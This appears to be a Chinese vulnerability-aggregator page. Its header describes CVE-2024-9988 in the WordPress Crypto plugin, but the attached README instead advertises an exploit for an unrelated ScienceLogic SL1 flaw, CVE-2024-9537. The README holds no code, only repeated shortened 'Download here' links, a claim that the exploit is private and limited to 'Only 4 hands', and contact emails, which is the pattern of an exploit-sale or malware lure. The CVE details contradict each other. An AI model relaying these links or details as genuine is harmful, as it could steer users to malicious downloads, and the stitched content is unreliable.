关联漏洞
标题:
WordPress plugin Crypto 安全漏洞
(CVE-2024-9988)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Crypto 2.15版本及之前版本存在安全漏洞,该漏洞源于“crypto_connect_ajax_process::register”函数中缺少对提供的用户的验证。
描述
Authentication Bypass Using an Alternate Path or Channel
介绍
# CVE-2024-9537
# Overview
ScienceLogic SL1 (formerly EM7) is affected by an unspecified vulnerability involving an unspecified third-party component packaged with SL1.
# Exploit
## [**Download here**](https://bit.ly/4fbV8Cb)
## Details
+ **CVE ID**: CVE-2024-9537
+ **Published**: 10/18/2024
+ **Impact**: Unconfidentiality
+ **Exploit**: Availability: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
This vulnerability has a critical severity with a CVSS v3.1 base score of 9.8 and a CVSS v4.0 base score of 9.3. It can be exploited over the network without requiring user interaction or privileges. The vulnerability has high impact on confidentiality, integrity, and availability of the affected systems. Given the network attack vector and low attack complexity, this vulnerability could potentially lead to unauthorized access, data breaches, and system compromise. The vulnerability is actively being exploited in the wild and was added to the CISA Known Exploited Vulnerability list.
## Affected versions
SL1 versions 12.1.3+, 12.2.3+, and 12.3+. Remediations have been made available for all SL1 versions back to version lines 10.1.x, 10.2.x, 11.1.x, 11.2.x, and 11.3.x.
## [**Download here**](https://bit.ly/4f9R3hX)
## Contact
+ **For inquiries, please contact: hatvixprime@outlook.com**
## [**Download here**](https://bit.ly/4fbV8Cb) (Only 4 hands)
文件快照
[4.0K] /data/pocs/034122e5ef811eefbfae043cb914e8d0d194c051
└── [1.5K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。